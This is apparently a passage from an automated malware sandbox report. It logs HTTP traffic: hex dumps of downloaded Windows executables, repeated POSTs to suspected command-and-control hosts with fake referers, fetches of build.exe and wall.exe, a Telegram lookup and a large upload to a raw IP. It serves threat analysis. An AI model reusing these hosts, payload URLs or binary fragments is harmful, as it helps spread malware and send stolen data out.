00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 21 Jun 2023 02:28:52 GMTContent-Type: application/octet-streamContent-Length: 4531200Last-Modified: Mon, 19 Jun 2023 12:11:37 GMTConnection: keep-aliveETag: "649045f9-452400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 45 90 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 45 00 00 08 00 00 00 00 00 00 9e 38 45 00 00 20 00 00 00 40 45 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 45 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 38 45 00 4b 00 00 00 00 40 45 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 45 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 18 45 00 00 20 00 00 00 1a 45 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 40 45 00 00 06 00 00 00 1c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 45 00 00 02 00 00 00 22 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 38 45 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 22 45 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a fb 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:28:24 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 19 Jun 2023 15:40:57 GMTETag: "55200-5fe7d5c5a74eb"Accept-Ranges: bytesContent-Length: 348672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 65 ad d1 65 21 cc bf 36 21 cc bf 36 21 cc bf 36 b2 82 27 36 20 cc bf 36 4e ba 21 36 35 cc bf 36 4e ba 15 36 4e cc bf 36 4e ba 14 36 03 cc bf 36 28 b4 2c 36 22 cc bf 36 21 cc be 36 5d cc bf 36 4e ba 10 36 20 cc bf 36 4e ba 25 36 20 cc bf 36 4e ba 22 36 20 cc bf 36 52 69 63 68 21 cc bf 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 69 97 04 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 3e 01 00 00 8c 74 01 00 00 00 00 a4 52 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 75 01 00 04 00 00 fc e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 42 01 00 28 00 00 00 00 60 74 01 78 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 34 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be 3c 01 00 00 10 00 00 00 3e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 ef 72 01 00 50 01 00 00 fc 02 00 00 42 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 64 61 00 00 00 a8 16 00 00 00 40 74 01 00 18 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 fa 00 00 00 60 74 01 00 fc 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:28:25 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://waqxengrru.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhqglbuwd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jripgqryng.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://idbuxqgr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pothbr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://odpck.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ycoiigtwj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vcwvscrxc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvutgbwskj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://joqdkcg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://donbnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qlnurflad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ntmuxpim.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hnhrnhttd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qthoy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dcqrdagr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbmiqvl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dyvnuhbcjr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kjuusjyy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rlgyg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uboeway.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hwcmvhxxsx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3100763767117689User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Content-Length: 131868Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://piqkfsrt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ocsxwsx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rtintbd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dplij.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wflcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gsbcsgpw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lkvtfhq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://piluifuq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gclqyjt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mkjcod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: potunulit.org
Source: global traffic	HTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpmpaipoai.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ogyjyxs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dibfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nckfeq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybtixpgmd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://odihsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ddsumlfwh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://njscsvci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ffkbtvwr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rextbbqqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eqvhkqvuv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: toobussy.com
